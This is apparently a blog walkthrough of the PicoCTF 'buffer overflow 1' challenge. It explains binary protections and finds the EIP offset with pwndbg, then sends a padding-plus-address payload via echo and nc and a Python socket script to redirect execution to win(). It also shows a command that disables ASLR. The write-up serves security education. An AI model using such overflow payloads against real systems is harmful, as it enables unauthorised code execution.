PicoCTF - Binary Exploitation 1
How to exploit a binary by overwriting the instruction pointer
Introduction
This post walks through the steps to complete a basic capture the flag challenge hosted at Pico CTF. The challenge is named 'buffer overflow 1' and is of medium difficulty.
First steps
Once the binary and source code have been downloaded, we first need to understand how the program works. We give the binary executable permissions and then run it:
chmod u+x vuln
Executing the program outputs this:
$ ./vuln
Please enter your string:
We provide the prompt some input:
$ ./vuln
Please enter your string:
hello friend
Okay, time to return... Fingers Crossed... Jumping to 0x804932f
This looks like a memory address. Interesting. We'll keep this in mind.
Moving on
Now we need to take a look at the file's metadata. We can do this using file and checksec.
vuln: ELF 32-bit LSB executable, Intel i386, version 1 (SYSV), dynamically linked, interpreter /lib/ld-linux.so.2, BuildID[sha1]=685b06b911b19065f27c2d369c18ed09fbadb543, for GNU/Linux 3.2.0, not stripped
Here we can see that it is a 32-bit binary that's dynamically linked. Most importantly for us, it is not stripped, meaning we can see the symbols (the names of functions, for example).
For checksec, I have set the format to csv, just so it's easier to comprehend.
Partial RELRO, No Canary found, NX disabled, No PIE
Great! It seems the binary has almost no protections enabled (only partial RELRO). Here's what some of these protections do:
Stack Canaries: These values, or 'canaries', are used to detect buffer overflows. Simply put, a canary is placed on the stack between local buffers and important data like the return address. If a buffer overflows and overwrites the canary, the program halts execution, stopping any malicious activity from occurring.
NX: The No-Execute bit marks certain regions of memory (like the stack) as non-executable, which ensures that injected code or shellcode doesn't run.
PIE: A Position Independent Executable can be loaded at any base address, so with ASLR enabled the binary lands at a different address every time it is executed. The offsets between functions inside the binary stay the same, but absolute memory addresses can no longer be hardcoded in exploit scripts.
Note that address randomization (ASLR), which PIE relies on, can be turned off on Linux systems via this command:
echo 0 | sudo tee /proc/sys/kernel/randomize_va_space
Don't turn this off on your main system. If you want to test it, use a virtual machine.
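To make the stack canary idea described above more concrete, here is a minimal Python sketch. It is a simplified model, not how a compiler actually implements the check: the frame layout, the 4-byte canary size, the placeholder return address and the function name call_with_canary are all assumptions made for illustration.

```python
import os

BUFSIZE = 32  # same buffer size as the challenge binary


def call_with_canary(user_input: bytes, canary: bytes = None) -> str:
    """Simulate a frame laid out as: buffer | canary | return address."""
    if canary is None:
        canary = os.urandom(4)  # hypothetical random value picked at startup
    frame = bytearray(BUFSIZE) + bytearray(canary) + bytearray(b"RETN")
    # Unchecked copy in the spirit of gets(): long input spills past the buffer.
    frame[:len(user_input)] = user_input
    # Check performed before returning: has the canary been changed?
    if bytes(frame[BUFSIZE:BUFSIZE + 4]) != canary:
        return "stack smashing detected"
    return "returned normally"


fixed = b"\x11\x22\x33\x44"  # fixed canary so the demo is repeatable
print(call_with_canary(b"hello friend", fixed))
print(call_with_canary(b"A" * 40, fixed))
```

The second call writes 40 bytes into a 32-byte buffer, so the canary is clobbered before the return address can be used. Since checksec reports no canary for this binary, nothing like this check stands in our way.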
Back to it
So we know the binary can be easily exploited because of the lack of defensive systems. Let's take a look at the source code and see what this program does:
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>
#include "asm.h"

#define BUFSIZE 32
#define FLAGSIZE 64

void win() {
  char buf[FLAGSIZE];
  FILE *f = fopen("flag.txt","r");
  if (f == NULL) {
    printf("%s %s", "Please create 'flag.txt' in this directory with your",
                    "own debugging flag.\n");
    exit(0);
  }

  fgets(buf,FLAGSIZE,f);
  printf(buf);
}

void vuln(){
  char buf[BUFSIZE];
  gets(buf);

  printf("Okay, time to return... Fingers Crossed... Jumping to 0x%x\n", get_return_address());
}

int main(int argc, char **argv){
  setvbuf(stdout, NULL, _IONBF, 0);

  gid_t gid = getegid();
  setresgid(gid, gid, gid);

  puts("Please enter your string: ");
  vuln();
  return 0;
}
We can see that there are three functions. Two things should be jumping out at you. Firstly, gets is being used to read input. This is great for us, but not for security. Never use gets. It doesn't check whether the input exceeds the allocated buffer. This means input larger than the buffer can overwrite other important data on the stack, including the saved return address, which is loaded into the instruction pointer when the function returns. So?
If we can control the instruction pointer (EIP) on 32-bit systems, we can control the program and tell it where to go and what to execute next.
Secondly, there is a win() function that is never called by either main() or vuln(), but we still need to call it to read the flag. We now know how to exploit this program.
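The overwrite described above can be sketched in a few lines of Python. This is a simplified model and not the real stack: it assumes a frame made of the buffer, an optional gap of compiler-added bytes, a 4-byte saved EBP and a 4-byte return address. The function name simulate_vuln and the gap parameter are hypothetical, and the real distance to the return address is measured in the Exploitation section.

```python
import struct

BUFSIZE = 32              # BUFSIZE from the challenge source
LEGIT_RETURN = 0x0804932f # address the program printed for harmless input


def simulate_vuln(user_input: bytes, gap: int = 0) -> int:
    """Return the address a simplified vuln() frame would jump back to."""
    frame = bytearray(BUFSIZE + gap)           # buf plus any extra bytes
    frame += struct.pack("<I", 0)              # placeholder for saved EBP
    frame += struct.pack("<I", LEGIT_RETURN)   # saved return address
    # gets() performs no bounds check, so the copy is not limited to BUFSIZE.
    frame[:len(user_input)] = user_input
    return_offset = BUFSIZE + gap + 4
    return struct.unpack_from("<I", frame, return_offset)[0]


print(hex(simulate_vuln(b"hello friend")))  # 0x804932f
print(hex(simulate_vuln(b"A" * 40)))        # 0x41414141
```

Short input leaves the saved return address alone. Forty bytes of 'A' run over the buffer and the saved EBP and replace the return address with 0x41414141, which is exactly the kind of control we are after.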
Exploitation
To exploit this binary, we first need to know how many bytes of input it takes to reach the EIP. We can find this using gdb. I'll be using pwndbg, a gdb plugin that comes with some extra features like cyclic, which is quite handy, as we'll see.
Step 1
Let's load the program in pwndbg and see how many characters it takes to overwrite the EIP. We can create a pattern of characters, which will help us identify the offset. We know the buffer length is 32 from the BUFSIZE constant in the source code. Let's create a cyclic pattern of 50:
pwndbg> cyclic 50
aaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaalaaama
Step 2
Let's run the program and use this as input. We should get a segmentation fault, but we should also get some very useful information.
pwndbg> r
Starting program: /home/kali/Downloads/re/bufferoverflow1/vuln
warning: Unable to find libthread_db matching inferior's thread library, thread debugging will not be available.
Please enter your string:
aaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaalaaama
Okay, time to return... Fingers Crossed... Jumping to 0x6161616c
Program received signal SIGSEGV, Segmentation fault.
0x6161616c in ?? ()
LEGEND: STACK | HEAP |
As expected, we received a segmentation fault. Let's take a look at the EIP.
EAX 0x41
EBX 0x6161616a ('jaaa')
ECX 0
EDX 0
EDI 0xf7ffcb60 (_rtld_global_ro) ◂— 0
ESI 0x8049350 (__libc_csu_init) ◂— endbr32
EBP 0x6161616b ('kaaa')
ESP 0xffffd240 ◂— 0xf700616d /* 'ma' */
EIP 0x6161616c ('laaa')
──────────────────────────
Great! As we can see, our input made its way into the EIP, overwriting it with our data. We need to find how many characters it took to get there. Luckily, pwndbg has a handy built-in for this.
pwndbg> cyclic -l laaa
Finding cyclic pattern of 4 bytes: b'laaa' (hex: 0x6c616161)
Found at offset 44
Using cyclic -l we can look up the pattern. We see our offset is 44, meaning 44 bytes of padding come before the 4 bytes that land in the EIP.
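For readers who want to see why the lookup works, here is a rough, stdlib-only Python sketch of the idea behind cyclic and cyclic -l. It generates a de Bruijn sequence over the lowercase alphabet, in which every 4-character window is unique, so the 4 bytes found in the EIP pin down a single position. The function names are my own, and this is an illustration of the technique rather than pwndbg's actual code.

```python
import struct
from itertools import islice

ALPHABET = "abcdefghijklmnopqrstuvwxyz"


def de_bruijn(alphabet: str = ALPHABET, n: int = 4):
    """Yield a de Bruijn sequence: no length-n window repeats."""
    k = len(alphabet)
    a = [0] * (k * n)

    def db(t, p):
        if t > n:
            if n % p == 0:
                for j in range(1, p + 1):
                    yield alphabet[a[j]]
        else:
            a[t] = a[t - p]
            yield from db(t + 1, p)
            for j in range(a[t - p] + 1, k):
                a[t] = j
                yield from db(t + 1, t)

    return db(1, 1)


def cyclic(length: int) -> str:
    """Return the first `length` characters of the sequence."""
    return "".join(islice(de_bruijn(), length))


def cyclic_find(chunk: str, search_space: int = 8192) -> int:
    """Return the offset of a 4-character chunk, or -1 if not found."""
    return cyclic(search_space).find(chunk)


print(cyclic(50))  # aaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaalaaama

# EIP held 0x6161616c; stored little endian, those bytes spell 'laaa'.
chunk = struct.pack("<I", 0x6161616c).decode()
print(chunk, cyclic_find(chunk))  # laaa 44
```

Because the value in the EIP was read from memory in little endian order, it has to be unpacked the same way before searching, which is why 0x6161616c corresponds to 'laaa' and not 'aaal'.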
Step 3
Now we need to find the memory address of the win() function. Why? So we can point the EIP at this function when we overflow the return address with our data. We can find the memory address like this:
pwndbg> disas win
Dump of assembler code for function win:
0x080491f6 <+0>: endbr32
0x080491fa <+4>: push ebp
0x080491fb <+5>: mov ebp,esp
0x080491fd <+7>: push ebx
0x080491fe <+8>: sub esp,0x54
0x08049201 <+11>: call 0x8049130 <__x86.get_pc_thunk.bx>
Using disas win, we can disassemble the function into its assembly equivalent. We see now why having the symbols makes our lives so much easier. I haven't shown the entirety of the win() function, as we only need the first line, particularly, the memory address: 0x080491f6
Step 4
We now have the offset and the memory address. We just need to put it all together. However, we first need to ensure the program reads the memory address properly. To do so, we must convert it to the little endian format, which the x86 architecture uses to store multi-byte values (least significant byte first). Thankfully, pwntools has a handy function for this, in python:
>>> import pwn
>>> print(pwn.p32(0x080491f6))
b'\xf6\x91\x04\x08'
Here, we have our bytes! b'\xf6\x91\x04\x08'
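If pwntools isn't installed, the same conversion can be done with Python's built-in struct module. This is just an equivalent sketch using the standard library, where the "<I" format means a little endian unsigned 32-bit integer. The constant name WIN_ADDR is my own.

```python
import struct

WIN_ADDR = 0x080491f6  # address of win() from the disassembly

little = struct.pack("<I", WIN_ADDR)  # least significant byte first
big = struct.pack(">I", WIN_ADDR)     # shown only for comparison

print(little)  # b'\xf6\x91\x04\x08'
print(big)     # b'\x08\x04\x91\xf6'

# Unpacking with the same format recovers the original address.
print(hex(struct.unpack("<I", little)[0]))  # 0x80491f6
```

The big endian form is how we naturally read the address, while the little endian form is the byte order that has to appear in our input.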
Step 5
Now all we need to do is send this data as input to the PicoCTF server. However, we first need to build a byte string that places the address after the 44 bytes of padding, so it lands in the right place.
>>> offset=44
>>> print(b"A" * offset + b'\xf6\x91\x04\x08')
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\xf6\x91\x04\x08'
We don't need the b at the start; it only marks a bytes literal in python and is not part of the payload. Using the server and port provided by PicoCTF, we can simply send the payload via nc. The -e flag tells echo to interpret the \x escapes as raw bytes:
$ echo -e 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\xf6\x91\x04\x08' | nc saturn.picoctf.net 55210
Please enter your string:
Okay, time to return... Fingers Crossed... Jumping to 0x80491f6
picoCTF{addr3ss3s_REDACTED}
And you should get your flag!
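How echo handles \x escapes differs between shells, so it can be more reliable to send the raw bytes from Python. Below is a minimal sketch using only the standard library. The function names build_payload and send_payload are my own, and the host and port are the ones from my instance, so substitute whatever PicoCTF gives you.

```python
import socket
import struct

OFFSET = 44            # padding length found with cyclic -l
WIN_ADDR = 0x080491f6  # address of win() from the disassembly


def build_payload(offset: int = OFFSET, target: int = WIN_ADDR) -> bytes:
    """Padding, then the little endian address, then a newline to end gets()."""
    return b"A" * offset + struct.pack("<I", target) + b"\n"


def send_payload(host: str, port: int, payload: bytes, timeout: float = 5.0) -> bytes:
    """Send the payload and collect whatever the server replies with."""
    chunks = []
    with socket.create_connection((host, port), timeout=timeout) as sock:
        sock.sendall(payload)
        try:
            while True:
                data = sock.recv(4096)
                if not data:
                    break
                chunks.append(data)
        except socket.timeout:
            pass  # server stopped talking; keep what we received
    return b"".join(chunks)


# Example usage (needs a live challenge instance):
# reply = send_payload("saturn.picoctf.net", 55210, build_payload())
# print(reply.decode(errors="replace"))
```

Nothing is sent until send_payload is called, so the payload can be inspected locally first.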
Conclusion
This challenge was fairly simple, but it teaches you what certain binary protections do, and how controlling the instruction pointer gives us control over what the program executes next.